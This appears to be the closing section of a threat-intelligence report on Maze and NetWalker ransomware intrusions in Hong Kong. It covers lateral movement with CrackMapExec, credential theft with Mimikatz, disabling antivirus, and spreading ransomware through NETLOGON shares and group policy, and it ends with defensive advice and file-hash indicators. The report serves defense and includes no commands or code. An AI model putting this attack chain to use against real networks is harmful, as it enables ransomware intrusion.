During our investigations we found that both intruders used common hacking tools, although with some differences. Tools observed include Windows administration tools like PsExec, open source tools for lateral movement like CrackMapExec, PowerShell versions of Mimikatz and PowerView for credential theft, further enumeration and privilege escalation, as well as off-the-shelf network scanners.

The Maze and NetWalker operators eventually managed to obtain access to administrator accounts, which allowed them in both cases to disable anti-virus solutions on network endpoints. Similarly, the creation of new domain administrator accounts gave them persistence on the network.

From such privileged positions the operators staged malware and other required artefacts on accessible locations in the victims’ networks, such as shared folders – for NetWalker – and NETLOGON folders – for Maze. We suspect that in both incidents scripts were used to automatically spread the ransomware in the network.

In the case of Maze, the deployment script would also disable endpoint protection software and enable services, such as Windows Remote Management, that would allow re-entry. Maze operators also abused group policy objects (GPOs) to weaken the victims’ endpoint defences by changing configurations, and to redeploy the malware to new machines. The latter ensured that the ransomware would also reach endpoints that had been shut down or that joined the network at a later time.

Conclusion

The double extortion of crypt and leak groups and the growing trend of targeted attacks against external network infrastructure make ransomware leaks one of the most significant threats to companies, regardless of sector. The recent targeting of Hong Kong organisations by Maze and NetWalker also reaffirms how closely the SAR’s threat landscape is associated with threat trends worldwide.

Companies in Hong Kong should therefore adopt a proactive approach to review their security posture and avoid targeted network intrusions in the first place. Presence of timely back-ups can help restore system availability but it is not an effective mitigation against the increasing threat of ransomware data leak. Organisations should also focus on maintaining situational awareness on developments in the global threat landscape, as threats to companies abroad are likely to quickly become threats to Hong Kong organisations too.

Indicators of Compromise

Hash                              File name         Description
c45ebccb7dc2bbc34c51c82c3eba6448  apply.ps1         Generates GPO package to disable AV, settings
16b5ddd25bb610270e52c1663931ef4c  system.dll        Maze ransomware
0e7d5d16e03393605f5f4862f1b9cc37  crackmapexec.exe  Lateral movement tool
d6a246a98a0387e2a5f9d95ddd8ae164  syspool.exe       Lightweight network scanner
696bb8648eceaa187cbc1f06205a23ce  city.exe          NetWalker ransomware
84ddf23d4307b1a9989352f4845d0ede  city.ps1          NetWalker PowerShell script